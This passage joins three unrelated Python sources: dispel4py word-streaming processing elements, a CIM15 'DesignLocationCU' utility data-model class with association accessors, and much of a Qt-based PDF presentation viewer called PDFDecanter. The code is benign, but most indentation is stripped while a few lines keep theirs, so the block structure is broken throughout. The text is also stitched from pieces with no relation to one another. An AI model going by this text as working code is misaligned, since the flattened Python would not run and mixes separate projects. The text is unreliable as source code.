ConsumerPE.__init__(self)
def _process(self, data):
print(data)
class RandomFilter(GenericPE):
'''
This PE randomly filters the input.
'''
input_name = 'input'
output_name = 'output'
def __init__(self):
GenericPE.__init__(self)
self._add_input('input')
self._add_output('output', tuple_type=['word'])
def process(self, inputs):
if random.choice([True, False]):
return {'output': inputs['input']}
# self.write('output', inputs['input'] )
return None
class WordCounter(GenericPE):
'''
This PE counts the number of times (counter) that it receives each word.
And it produces as an output: the same word (the input) and its counter.
'''
input_name = 'input'
output_name = 'output'
def __init__(self):
GenericPE.__init__(self)
self._add_input('input', grouping=[0])
self._add_output('output', tuple_type=['word', 'count'])
self.mywords = defaultdict(int)
def _process(self, inputs):
word = inputs['input'][0]
self.mywords[word] += 1
return {'output': [word, self.mywords[word]]}
class RandomWordProducer(GenericPE):
'''
This PE produces a random word as an output.
'''
words = ["dispel4py", "computing", "mpi", "processing",
"simple", "analysis", "data"]
def __init__(self):
GenericPE.__init__(self)
self._add_output('output', tuple_type=['word'])
def process(self, inputs=None):
word = random.choice(RandomWordProducer.words)
outputs = {'output': [word]}
return outputs
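# Illustrative composition (hedged sketch): wiring two of the PEs above into
# a word-count workflow, assuming dispel4py's WorkflowGraph API.
#
#   from dispel4py.workflow_graph import WorkflowGraph
#
#   producer = RandomWordProducer()
#   counter = WordCounter()
#   graph = WorkflowGraph()
#   graph.connect(producer, 'output', counter, 'input')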
|
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM15.IEC61970.Core.IdentifiedObject import IdentifiedObject
class DesignLocationCU(IdentifiedObject):
"""Compatible unit at a given design location.Compatible unit at a given design location.
"""
def __init__(self, energizationFlag=False, cuUsage='', removalDate='', cuAction="install", cuAccount='', cuQuantity="", ConditionFactors=None, CompatibleUnits=None, WorkTasks=None, Designs=None, CUGroups=None, DesignLocation=None, status=None, *args, **kw_args):
"""Initialises a new 'DesignLocationCU' instance.
@param energizationFlag: True if associated electrical equipment is intended to be energized while work is being performed.
@param cuUsage: As the same CU can be used for different purposes and accounting purposes, usage must be specified. Examples include: distribution, transmission, substation.
@param removalDate: Year when a CU that represents an asset is removed.
@param cuAction: A code that instructs the crew what action to perform. Values are: "install", "remove", "transfer", "abandon"
@param cuAccount: A code that helps direct accounting (capital, expense, or accounting treatment).
@param cuQuantity: The quantity of the CU being assigned to this location.
@param ConditionFactors:
@param CompatibleUnits:
@param WorkTasks:
@param Designs:
@param CUGroups:
@param DesignLocation:
@param status:
"""
#: True if associated electrical equipment is intended to be energized while work is being performed.
self.energizationFlag = energizationFlag
#: As the same CU can be used for different purposes and accounting purposes, usage must be specified. Examples include: distribution, transmission, substation.
self.cuUsage = cuUsage
#: Year when a CU that represents an asset is removed.
self.removalDate = removalDate
#: A code that instructs the crew what action to perform. Values are: "install", "remove", "transfer", "abandon"
self.cuAction = cuAction
#: A code that helps direct accounting (capital, expense, or accounting treatment).
self.cuAccount = cuAccount
#: The quantity of the CU being assigned to this location.
self.cuQuantity = cuQuantity
self._ConditionFactors = []
self.ConditionFactors = [] if ConditionFactors is None else ConditionFactors
self._CompatibleUnits = []
self.CompatibleUnits = [] if CompatibleUnits is None else CompatibleUnits
self._WorkTasks = []
self.WorkTasks = [] if WorkTasks is None else WorkTasks
self._Designs = []
self.Designs = [] if Designs is None else Designs
self._CUGroups = []
self.CUGroups = [] if CUGroups is None else CUGroups
self._DesignLocation = None
self.DesignLocation = DesignLocation
self.status = status
super(DesignLocationCU, self).__init__(*args, **kw_args)
_attrs = ["energizationFlag", "cuUsage", "removalDate", "cuAction", "cuAccount", "cuQuantity"]
_attr_types = {"energizationFlag": bool, "cuUsage": str, "removalDate": str, "cuAction": str, "cuAccount": str, "cuQuantity": str}
_defaults = {"energizationFlag": False, "cuUsage": '', "removalDate": '', "cuAction": "install", "cuAccount": '', "cuQuantity": ""}
_enums = {"cuAction": "WorkActionKind"}
_refs = ["ConditionFactors", "CompatibleUnits", "WorkTasks", "Designs", "CUGroups", "DesignLocation", "status"]
_many_refs = ["ConditionFactors", "CompatibleUnits", "WorkTasks", "Designs", "CUGroups"]
def getConditionFactors(self):
return self._ConditionFactors
def setConditionFactors(self, value):
for p in self._ConditionFactors:
filtered = [q for q in p.DesignLocationCUs if q != self]
            p._DesignLocationCUs = filtered
for r in value:
if self not in r._DesignLocationCUs:
r._DesignLocationCUs.append(self)
self._ConditionFactors = value
ConditionFactors = property(getConditionFactors, setConditionFactors)
def addConditionFactors(self, *ConditionFactors):
for obj in ConditionFactors:
if self not in obj._DesignLocationCUs:
obj._DesignLocationCUs.append(self)
self._ConditionFactors.append(obj)
def removeConditionFactors(self, *ConditionFactors):
for obj in ConditionFactors:
if self in obj._DesignLocationCUs:
obj._DesignLocationCUs.remove(self)
self._ConditionFactors.remove(obj)
def getCompatibleUnits(self):
return self._CompatibleUnits
def setCompatibleUnits(self, value):
for p in self._CompatibleUnits:
filtered = [q for q in p.DesignLocationCUs if q != self]
            p._DesignLocationCUs = filtered
for r in value:
if self not in r._DesignLocationCUs:
r._DesignLocationCUs.append(self)
self._CompatibleUnits = value
CompatibleUnits = property(getCompatibleUnits, setCompatibleUnits)
def addCompatibleUnits(self, *CompatibleUnits):
for obj in CompatibleUnits:
if self not in obj._DesignLocationCUs:
obj._DesignLocationCUs.append(self)
self._CompatibleUnits.append(obj)
def removeCompatibleUnits(self, *CompatibleUnits):
for obj in CompatibleUnits:
if self in obj._DesignLocationCUs:
obj._DesignLocationCUs.remove(self)
self._CompatibleUnits.remove(obj)
def getWorkTasks(self):
return self._WorkTasks
def setWorkTasks(self, value):
for p in self._WorkTasks:
filtered = [q for q in p.DesignLocationCUs if q != self]
            p._DesignLocationCUs = filtered
for r in value:
if self not in r._DesignLocationCUs:
r._DesignLocationCUs.append(self)
self._WorkTasks = value
WorkTasks = property(getWorkTasks, setWorkTasks)
def addWorkTasks(self, *WorkTasks):
for obj in WorkTasks:
if self not in obj._DesignLocationCUs:
obj._DesignLocationCUs.append(self)
self._WorkTasks.append(obj)
def removeWorkTasks(self, *WorkTasks):
for obj in WorkTasks:
if self in obj._DesignLocationCUs:
obj._DesignLocationCUs.remove(self)
self._WorkTasks.remove(obj)
def getDesigns(self):
return self._Designs
def setDesigns(self, value):
for p in self._Designs:
filtered = [q for q in p.DesignLocationsCUs if q != self]
            p._DesignLocationsCUs = filtered
for r in value:
if self not in r._DesignLocationsCUs:
r._DesignLocationsCUs.append(self)
self._Designs = value
Designs = property(getDesigns, setDesigns)
def addDesigns(self, *Designs):
for obj in Designs:
if self not in obj._DesignLocationsCUs:
obj._DesignLocationsCUs.append(self)
self._Designs.append(obj)
def removeDesigns(self, *Designs):
for obj in Designs:
if self in obj._DesignLocationsCUs:
obj._DesignLocationsCUs.remove(self)
self._Designs.remove(obj)
def getCUGroups(self):
return self._CUGroups
def setCUGroups(self, value):
for p in self._CUGroups:
filtered = [q for q in p.DesignLocationCUs if q != self]
            p._DesignLocationCUs = filtered
for r in value:
if self not in r._DesignLocationCUs:
r._DesignLocationCUs.append(self)
self._CUGroups = value
CUGroups = property(getCUGroups, setCUGroups)
def addCUGroups(self, *CUGroups):
for obj in CUGroups:
if self not in obj._DesignLocationCUs:
obj._DesignLocationCUs.append(self)
self._CUGroups.append(obj)
def removeCUGroups(self, *CUGroups):
for obj in CUGroups:
if self in obj._DesignLocationCUs:
obj._DesignLocationCUs.remove(self)
self._CUGroups.remove(obj)
def getDesignLocation(self):
return self._DesignLocation
def setDesignLocation(self, value):
if self._DesignLocation is not None:
filtered = [x for x in self.DesignLocation.DesignLocationCUs if x != self]
self._DesignLocation._DesignLocationCUs = filtered
self._DesignLocation = value
if self._DesignLocation is not None:
if self not in self._DesignLocation._DesignLocationCUs:
self._DesignLocation._DesignLocationCUs.append(self)
DesignLocation = property(getDesignLocation, setDesignLocation)
status = None
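    # Illustrative usage (hedged sketch): the accessor methods above keep both
    # sides of each association in sync, so with hypothetical related objects:
    #
    #   cu = DesignLocationCU()
    #   cu.addWorkTasks(task)      # task._DesignLocationCUs now contains cu
    #   cu.removeWorkTasks(task)   # ...and no longer does afterwards
    #   cu.DesignLocation = loc    # loc._DesignLocationCUs gains cu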
|
|
# Copyright 2012-2014 Hans Meine <hans_meine@gmx.net>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .dynqt import qt, QtCore, QtGui, QtWidgets, QtOpenGL, getprop as p
import numpy, os, sys, time, math, operator
from . import bz2_pickle
from . import decomposer, slide_renderer
__version__ = "0.1"
PADDING_X = 0.03 # 3% of frame width
PADDING_Y = 0.03 # 3% of frame height
LINEBREAK_PADDING = 2.5 * PADDING_Y
INDENT_X = 0 # 0.125
class GeometryAnimation(QtCore.QVariantAnimation):
def __init__(self, item, parent = None):
QtCore.QVariantAnimation.__init__(self, parent)
self._item = item
def updateCurrentValue(self, value):
self._item.setPos(value.topLeft())
self._item.setScale(value.width())
class PDFDecanter(QtCore.QObject):
"""Main presentation program using the QGraphicsView framework for
rendering.
    An existing view may be supplied for the presentation, so this
    class does not directly represent a window (or widget).
Instead, eventFilter() is used to catch events for the view (and
scene), and pass them on to methods like resizeEvent(), simulating
the usual methods of a regular QWidget.
The QGraphicsScene is set to the window size (and this relation is
maintained in resizeEvent). The root item in the scene is a
QGraphicsWidget (_presentationItem) that indirectly contains a
grid (cf. _setupGrid) of SlideRenderer items (_renderers) with a
layout used for the overview mode. The _presentationItem is used
for zooming out into the overview mode and back. Between the
_presentationItem and the renderers, there is a viewport
(cf. _slideViewport) that serves as a clipping rect, in order to
hide neighboring slides in case of a larger window (e.g. 16:9
fullscreen with 4:3 slides)."""
def __init__(self, view = None, slideSize = (1024, 768)):
QtCore.QObject.__init__(self)
self._slideSize = slideSize
if view is None:
view = QtWidgets.QGraphicsView()
w, h = slideSize
view.resize(w, h)
self._view = view
self._view.installEventFilter(self)
self._view.setRenderHints(QtGui.QPainter.Antialiasing | QtGui.QPainter.SmoothPixmapTransform)
self._view.setFrameStyle(QtWidgets.QFrame.NoFrame)
self._view.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self._view.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
if view.scene() is not None:
self._scene = view.scene()
self._scene.setSceneRect(0, 0, p(self._view.width), p(self._view.height))
else:
self._scene = QtWidgets.QGraphicsScene(0, 0, p(self._view.width), p(self._view.height))
self._view.setScene(self._scene)
self._scene.setBackgroundBrush(QtCore.Qt.black)
self._scene.installEventFilter(self) # for MouseButtonRelease events
self._presentationItem = QtWidgets.QGraphicsWidget()
self._scene.addItem(self._presentationItem)
self._slideViewport = QtWidgets.QGraphicsRectItem(self._presentationItem)
self._slideViewport.setFlag(QtWidgets.QGraphicsItem.ItemClipsChildrenToShape)
        self._cursor = None
        self._mousePressPos = None
self._renderers = None
self._currentFrameIndex = None
self._gotoSlideIndex = None
self._gotoSlideTimer = QtCore.QTimer(self)
self._gotoSlideTimer.setSingleShot(True)
self._gotoSlideTimer.setInterval(1000)
self._gotoSlideTimer.timeout.connect(self._clearGotoSlide)
self._hideMouseTimer = QtCore.QTimer(self)
self._hideMouseTimer.setSingleShot(True)
self._hideMouseTimer.setInterval(1000)
self._hideMouseTimer.timeout.connect(self._hideMouse)
self._hideMouseTimer.start()
self._view.viewport().setMouseTracking(True)
self._view.viewport().installEventFilter(self)
self._inOverview = False
self._loadConfig()
def _loadConfig(self):
self._configDirectory = os.path.expanduser('~/.pdf_decanter')
self._classifierFilename = os.path.join(self._configDirectory, 'classifier')
decomposer.load_classifier(self._classifierFilename)
def enableGL(self):
try:
from OpenGL import GL
except ImportError:
sys.stderr.write("WARNING: OpenGL could not be imported, running without GL...\n")
return False
glWidget = QtOpenGL.QGLWidget(QtOpenGL.QGLFormat(QtOpenGL.QGL.SampleBuffers))
if not glWidget.isValid():
sys.stderr.write("WARNING: Could not create valid OpenGL context, running without GL...\n")
return False
self._view.setViewport(glWidget)
self._view.setViewportUpdateMode(QtWidgets.QGraphicsView.FullViewportUpdate)
self._view.viewport().setMouseTracking(True)
self._view.viewport().installEventFilter(self)
return True
def view(self):
return self._view
def slideSize(self):
"""Return size at which to render PDFs"""
return self._slideSize
def presentationBounds(self):
result = QtCore.QRectF()
for renderer in self._renderers:
br = renderer.boundingRect()
br.translate(p(renderer.pos))
result |= br
return result
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.MouseMove:
self.mouseMoveEvent(event)
return False
event.ignore()
if obj is self._view:
if event.type() == QtCore.QEvent.KeyPress:
self.keyPressEvent(event)
elif event.type() == QtCore.QEvent.Resize:
self.resizeEvent(event)
elif event.type() == QtCore.QEvent.Wheel:
self.wheelEvent(event)
elif obj is self._scene:
if event.type() == QtCore.QEvent.GraphicsSceneMousePress:
self.mousePressEvent(event)
elif event.type() == QtCore.QEvent.GraphicsSceneMouseRelease:
self.mouseReleaseEvent(event)
if event.isAccepted():
return True
return False
def resizeEvent(self, e):
assert p(self._view.size) == e.size()
self._scene.setSceneRect(0, 0, p(self._view.width), p(self._view.height))
self._adjustSlideViewport()
pres = self._presentationItem
if not self._inOverview:
renderer = self._currentRenderer()
if not renderer:
return
scale, margin = self._maxpectScaleAndMargin(renderer.frame().sizeF())
pres.setPos(QtCore.QPointF(margin.width(), margin.height()) - p(renderer.pos) * scale)
else:
scale = self._overviewScale()
pres.setScale(scale)
def _adjustSlideViewport(self):
if self._currentFrameIndex is None:
return
if not self._inOverview:
renderer = self._currentRenderer()
viewportRect = QtCore.QRectF(p(renderer.pos), p(renderer.size))
else:
viewportRect = self.presentationBounds()
self._slideViewport.setRect(viewportRect)
def wheelEvent(self, e):
if self._inOverview:
overview = self._presentationItem
overviewPos = p(overview.pos)
overviewPos.setY(overviewPos.y() + e.delta())
self._adjustOverviewPos(overviewPos, self._overviewScale())
overview.setPos(overviewPos)
else:
e.ignore()
def mouseMoveEvent(self, e):
self._view.unsetCursor()
self._hideMouseTimer.start()
def _hideMouse(self):
self._view.setCursor(QtCore.Qt.BlankCursor)
def mousePressEvent(self, e):
self._mousePressPos = e.screenPos()
def mouseReleaseEvent(self, e):
wasClick = (self._mousePressPos is not None) \
and (e.screenPos() - self._mousePressPos).manhattanLength() < 6
self._mousePressPos = None
if not wasClick:
return
if e.modifiers() & QtCore.Qt.ShiftModifier:
renderer = None
for item in self._scene.items(e.scenePos()):
if item in self._renderers:
renderer = item
break
if renderer is not None:
for item in self._scene.items(e.scenePos()):
patch = renderer.patchOf(item)
if patch is not None:
if self.toggleNavigationFlag(patch):
return
QtWidgets.qApp.beep() # no valid item found
return
if not self._inOverview:
# RMB: overview
if e.button() == QtCore.Qt.RightButton:
self.showOverview()
# MMB: go back one frame (if not at beginning):
elif e.button() == QtCore.Qt.MiddleButton:
if self._currentFrameIndex > 0:
self.gotoFrame(self._currentFrameIndex - 1)
# LMB: advance one frame (if not at end):
else:
if self._currentFrameIndex < self._slides.frameCount() - 1:
self.gotoFrame(self._currentFrameIndex + 1)
else:
# find frame clicked on in overview and jump to it:
for item in self._scene.items(e.scenePos()):
#if isinstance(item, slide_renderer.SlideRenderer):
if item in self._renderers:
slideIndex = self._renderers.index(item)
self.gotoFrame(self._slides[slideIndex].currentFrame().frameIndex())
break
def loadPDF(self, pdfFilename, cacheFilename = None, useCache = None, createCache = False):
slides = None
pdfFilename = os.path.abspath(pdfFilename)
if cacheFilename is None:
dirname, basename = os.path.split(pdfFilename)
w, h = self.slideSize()
cacheFilename = os.path.join(
dirname, "pdf_decanter_cache_%s_%dx%d.bz2" % (
os.path.splitext(basename)[0], w, h))
if useCache is not False:
if os.path.exists(cacheFilename):
if os.path.getmtime(cacheFilename) >= os.path.getmtime(pdfFilename) or useCache:
sys.stdout.write("reading cache '%s'...\n" % cacheFilename)
try:
slides = bz2_pickle.unpickle(cacheFilename)
except Exception as e:
sys.stderr.write("FAILED to load cache (%s), re-rendering...\n" % (e, ))
if slides is None:
wallClockTime = time.time()
            cpuTime = time.process_time()  # CPU time; time.clock() was removed in Python 3.8
            slides = decomposer.decompose_pdf(pdfFilename, sizePX = self.slideSize())
            print("complete rendering took %.3gs. (%.3gs. real time)" % (
                time.process_time() - cpuTime, time.time() - wallClockTime))
if createCache:
sys.stdout.write("caching in '%s'...\n" % cacheFilename)
bz2_pickle.pickle(cacheFilename, slides)
self.setSlides(slides)
self._view.setWindowFilePath(pdfFilename)
def setSlides(self, slides):
self._slides = slides
assert not self._renderers, "FIXME: delete old renderers / graphics items"
self._renderers = [slide_renderer.SlideRenderer(s, self._slideViewport) for s in slides]
for r in self._renderers:
r.setLinkHandler(self.followLink)
self._setupGrid()
self.gotoFrame(0)
def slides(self):
return self._slides
def toggleNavigationFlag(self, patch):
w, h = self.slideSize()
if patch.flag(patch.FLAG_HEADER):
patch.setFlag(patch.FLAG_HEADER, False)
elif patch.flag(patch.FLAG_FOOTER):
patch.setFlag(patch.FLAG_FOOTER, False)
elif patch.boundingRect().bottom() < h/2:
patch.setFlag(patch.FLAG_HEADER, True)
elif patch.boundingRect().top() > h/2:
patch.setFlag(patch.FLAG_FOOTER, True)
else:
            return False # cannot decide which flag it is
decomposer.add_navigation_example(patch)
if not os.path.exists(self._configDirectory):
os.mkdir(self._configDirectory)
decomposer.save_classifier(self._classifierFilename)
decomposer.classify_navigation(self._slides.frames())
if slide_renderer.FrameRenderer.DEBUG:
for r in self._renderers:
r.resetItems()
return True
def snapshot(self, filename = 'snapshot.svg'):
svg = qt.QtSvg.QSvgGenerator()
svg.setFileName(filename)
svg.setSize(QtCore.QSize(*self.slideSize()))
        painter = QtGui.QPainter(svg)  # local name avoids shadowing the module-level `p` helper
        self._scene.render(painter)
        painter.end()
        svg.outputDevice().close()
def _setupGrid(self):
self._overviewColumnCount = min(5, int(math.ceil(math.sqrt(len(self._slides)))))
slideLevel = numpy.zeros((len(self._slides), ), dtype = int)
infos = self._slides.pdfInfos()
if infos and infos.outline():
for level, title, frameIndex in infos.outline():
slideLevel[self._slides.frame(frameIndex).slide().slideIndex()] = level
# prevent too many linebreaks (very fine-grained PDF outline):
while slideLevel.max() > 0 and numpy.diff(numpy.nonzero(slideLevel)[0]).mean() < self._overviewColumnCount-1:
slideLevel[slideLevel == slideLevel.max()] = 0
x = y = col = rowHeight = 0
lastLineBreak = previousWidth = 0
for i, renderer in enumerate(self._renderers):
if col > 0:
x += PADDING_X * max(previousWidth, renderer.slide().sizeF().width())
if slideLevel[i] and lastLineBreak < i - 1:
y += (1.0 + PADDING_Y + LINEBREAK_PADDING / slideLevel[i]) * rowHeight
x = col = rowHeight = 0
lastLineBreak = i
elif col >= self._overviewColumnCount:
y += (1.0 + PADDING_Y) * rowHeight
x = INDENT_X * renderer.slide().sizeF().width() if lastLineBreak else 0
col = rowHeight = 0
renderer.setPos(x, y)
x += renderer.slide().sizeF().width()
previousWidth = renderer.slide().sizeF().width()
rowHeight = max(rowHeight, renderer.slide().sizeF().height())
col += 1
def _updateCursor(self, animated):
"""Moves the cursor to the current renderer. If animated is
True, a _cursorAnimation will be set up and started, and if
the cursor target is not fully visible, the overview will also
be scrolled (animatedly). The overview pos will not be
changed if animated == False."""
if self._cursor is None:
self._cursor = QtWidgets.QGraphicsWidget(self._slideViewport)
self._cursorRect = QtWidgets.QGraphicsRectItem(self._cursor)
self._cursorRect.setPen(QtGui.QPen(QtCore.Qt.yellow, 25))
self._cursorRect.setBrush(QtGui.QBrush(QtGui.QColor(255, 255, 0, 100)))
self._cursor.setZValue(-10)
self._cursorPos = None
r = QtCore.QRectF(p(self._currentRenderer().pos),
self._currentRenderer().slide().sizeF())
if not animated:
self._cursor.setPos(r.topLeft())
self._cursorRect.setRect(QtCore.QRectF(QtCore.QPointF(0, 0), r.size()))
else:
self._cursorAnimation = QtCore.QPropertyAnimation(self._cursor, "pos")
self._cursorAnimation.setDuration(100)
self._cursorAnimation.setStartValue(p(self._cursor.pos))
self._cursorAnimation.setEndValue(r.topLeft())
self._cursorAnimation.start()
pres = self._presentationItem
if not p(self._scene.sceneRect).contains(
r.center() * p(pres.scale) + p(pres.pos)):
self._animateOverviewGroup(self._overviewPosForCursor(r), p(pres.scale))
def _adjustOverviewPos(self, pos, scale):
"""adjust position in order to prevent ugly black margins"""
# overview smaller than scene?
if p(self._scene.sceneRect).height() > self.presentationBounds().height() * scale:
# yes, center overview (evenly distributing black margin):
pos.setY(0.5 * (p(self._scene.sceneRect).height() - self.presentationBounds().height() * scale))
elif pos.y() > 0.0:
# no, prevent black margin at top:
pos.setY(0.0)
else:
# prevent black margin at bottom:
minY = p(self._scene.sceneRect).height() - self.presentationBounds().height() * scale
if pos.y() < minY:
pos.setY(minY)
def _animateOverviewGroup(self, pos, scale):
self._adjustOverviewPos(pos, scale)
currentGeometry = QtCore.QRectF(p(self._presentationItem.pos),
QtCore.QSizeF(p(self._presentationItem.scale),
p(self._presentationItem.scale)))
targetGeometry = QtCore.QRectF(pos, QtCore.QSizeF(scale, scale))
self._overviewAnimation = GeometryAnimation(self._presentationItem)
self._overviewAnimation.setStartValue(currentGeometry)
self._overviewAnimation.setEndValue(targetGeometry)
self._overviewAnimation.setDuration(300)
self._overviewAnimation.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self._overviewAnimation.finished.connect(self._resetOverviewAnimation)
self._overviewAnimation.start()
def _resetOverviewAnimation(self):
if not self._overviewAnimation:
return
self._overviewAnimation.stop()
self._overviewAnimation = None
self._adjustSlideViewport()
def _overviewScale(self):
"""Return presentation scale that fills the view width with the overview."""
return p(self._scene.sceneRect).width() / self.presentationBounds().width()
def _overviewPosForCursor(self, r = None):
if r is None:
r = self._cursor.childItems()[0].boundingRect()
r.translate(p(self._cursor.pos))
s = self._overviewScale()
y = (0.5 * p(self._scene.sceneRect).height() - r.center().y() * s)
return QtCore.QPointF(0, y)
def showOverview(self):
self._updateCursor(animated = False)
self._cursorPos = None
for r in self._renderers:
r.showCustomContent()
self._animateOverviewGroup(self._overviewPosForCursor(), self._overviewScale())
self._inOverview = True
self._adjustSlideViewport()
def _currentFrame(self):
"""Returns current Frame object (or None, in initialization phase)."""
if self._currentFrameIndex is None:
return None
return self._slides.frame(self._currentFrameIndex)
def _currentSlideIndex(self):
"""Returns current slide index (or None, in initialization phase)."""
frame = self._currentFrame()
if frame is None:
return None
return frame.slide().slideIndex()
def _currentRenderer(self):
"""Returns currently active SlideRenderer (or None, in initialization phase)."""
slideIndex = self._currentSlideIndex()
if slideIndex is None:
return None
return self._renderers[slideIndex]
def _maxpectScaleAndMargin(self, frameSize):
"""Returns presentation scale and margin (for one side,
i.e. half of the excessive space) for centering a frame of the
given size in the current view."""
windowSize = p(self._scene.sceneRect).size()
scale = min(windowSize.width() / frameSize.width(),
windowSize.height() / frameSize.height())
margin = (windowSize - scale * frameSize) / 2.0
return scale, margin
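    # Worked example (illustrative): for a 1920x1080 scene and a 1024x768
    # frame, scale = min(1920/1024, 1080/768) = 1.40625; the scaled frame is
    # 1440x1080, so margin = ((1920 - 1440) / 2, (1080 - 1080) / 2) = (240, 0):
    # 240px of black on either side and none above or below.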
def gotoFrame(self, frameIndex):
"""Identifies renderer responsible for the given frame and
lets it show that frame. If we're in overview mode, the scene
        is zoomed in on that renderer."""
targetFrame = self._slides.frame(frameIndex)
renderer = self._renderers[targetFrame.slide().slideIndex()]
renderer.uncover()
animated = (not self._inOverview) \
and self._currentFrameIndex is not None
sourceFrame = self._currentRenderer().frame() if animated else None
renderer.showFrame(targetFrame.subIndex(), animateFrom = sourceFrame)
self._currentFrameIndex = frameIndex
scale, margin = self._maxpectScaleAndMargin(targetFrame.sizeF())
targetPresentationPos = QtCore.QPointF(margin.width(), margin.height()) - p(renderer.pos) * scale
if not self._inOverview:
self._presentationItem.setPos(targetPresentationPos)
self._adjustSlideViewport()
else:
self._inOverview = False
self._animateOverviewGroup(targetPresentationPos, scale)
def _clearGotoSlide(self):
self._gotoSlideIndex = None
def followLink(self, link):
if self._inOverview:
return False
if isinstance(link, int):
frameIndex = link
self.gotoFrame(frameIndex)
self._mousePressPos = None # don't handle click again in mouseReleaseEvent
return True
return False
def keyPressEvent(self, event):
if event.text() == 'D':
slide_renderer.toggleDebug()
for r in self._renderers:
r.resetItems()
if event.text() == 'F':
win = self._view.window()
if win.isFullScreen():
win.showNormal()
else:
win.showFullScreen()
event.accept()
elif event.key() in (QtCore.Qt.Key_F, QtCore.Qt.Key_L):
r = self._currentRenderer()
r.showFrame(0 if event.key() == QtCore.Qt.Key_F else len(r.slide()) - 1)
event.accept()
elif event.text() and event.text() in '0123456789':
if self._gotoSlideIndex is None:
self._gotoSlideIndex = 0
self._gotoSlideIndex = self._gotoSlideIndex * 10 + int(event.text())
self._gotoSlideTimer.start()
event.accept()
elif event.key() == QtCore.Qt.Key_Return:
if self._gotoSlideIndex is not None:
event.accept()
slideIndex = self._gotoSlideIndex - 1
self._gotoSlideIndex = None
self.gotoFrame(self._slides[slideIndex].currentFrame().frameIndex())
elif event.text() == 'Q':
self._view.window().close()
event.accept()
elif event.text() == 'P':
headerItems = sum((r.headerItems() for r in self._renderers), [])
footerItems = sum((r.footerItems() for r in self._renderers), [])
if headerItems and footerItems:
onoff = headerItems[0].isVisible() + 2*footerItems[0].isVisible()
onoff = (onoff + 1) % 4
for headerItem in headerItems:
headerItem.setVisible(onoff % 2)
for footerItem in footerItems:
footerItem.setVisible(onoff // 2)
event.accept()
elif headerItems or footerItems:
items = headerItems or footerItems
onoff = not items[0].isVisible()
for item in items:
item.setVisible(onoff)
event.accept()
else:
sys.stderr.write('DEBUG: no header/footer items found.\n')
if event.isAccepted():
return
if self._inOverview:
if event.key() in (QtCore.Qt.Key_Right, QtCore.Qt.Key_Left,
QtCore.Qt.Key_Down, QtCore.Qt.Key_Up):
self._handleCursorKeyInOverview(event)
event.accept()
elif event.key() in (QtCore.Qt.Key_Home, ):
if self._currentFrameIndex:
self._currentFrameIndex = 0
self._updateCursor(animated = True)
event.accept()
elif event.text() == 'U':
for renderer in self._renderers:
renderer.uncoverAll()
event.accept()
elif event.text() == 'R':
for renderer in self._renderers:
renderer.showFrame(0)
renderer.uncover(False)
if self._currentFrameIndex:
self._currentFrameIndex = 0
self._updateCursor(animated = True)
event.accept()
elif event.key() in (QtCore.Qt.Key_Tab, QtCore.Qt.Key_Return, QtCore.Qt.Key_Space):
self.gotoFrame(self._currentFrameIndex)
event.accept()
else:
if event.key() in (QtCore.Qt.Key_Space, QtCore.Qt.Key_Right, QtCore.Qt.Key_PageDown):
if self._currentFrameIndex < self._slides.frameCount() - 1:
self.gotoFrame(self._currentFrameIndex + 1)
event.accept()
elif event.key() in (QtCore.Qt.Key_Backspace, QtCore.Qt.Key_Left, QtCore.Qt.Key_PageUp):
if self._currentFrameIndex > 0:
self.gotoFrame(self._currentFrameIndex - 1)
event.accept()
elif event.key() in (QtCore.Qt.Key_Home, ):
if self._currentFrameIndex:
self.gotoFrame(0)
event.accept()
elif event.key() in (QtCore.Qt.Key_Tab, ):
self.showOverview()
event.accept()
def _handleCursorKeyInOverview(self, event):
item = self._currentRenderer()
r = item.sceneBoundingRect()
if self._cursorPos is None:
self._cursorPos = r.center()
desiredSlideIndex = None
# naming of variables follows downwards-case, other cases are rotated:
if event.key() == QtCore.Qt.Key_Down:
ge = operator.ge
bottom = r.bottom()
getTop = QtCore.QRectF.top
getX = QtCore.QPointF.x
getY = QtCore.QPointF.y
setY = QtCore.QPointF.setY
sortDirection = 1 # ascending Y
mustOverlapInY = False
elif event.key() == QtCore.Qt.Key_Up:
ge = operator.le
bottom = r.top()
getTop = QtCore.QRectF.bottom
getX = QtCore.QPointF.x
getY = QtCore.QPointF.y
setY = QtCore.QPointF.setY
sortDirection = -1 # descending Y
mustOverlapInY = False
elif event.key() == QtCore.Qt.Key_Right:
ge = operator.ge
bottom = r.right()
getTop = QtCore.QRectF.left
getX = QtCore.QPointF.y
getY = QtCore.QPointF.x
setY = QtCore.QPointF.setX
sortDirection = 1 # ascending X
mustOverlapInY = True
elif event.key() == QtCore.Qt.Key_Left:
ge = operator.le
bottom = r.left()
getTop = QtCore.QRectF.right
getX = QtCore.QPointF.y
getY = QtCore.QPointF.x
setY = QtCore.QPointF.setX
sortDirection = -1 # descending X
mustOverlapInY = True
# handle all cases, with naming of variables following downwards-case (see above)
belowItems = []
for otherItem in self._renderers:
r2 = otherItem.sceneBoundingRect()
if ge(getTop(r2), bottom):
if mustOverlapInY:
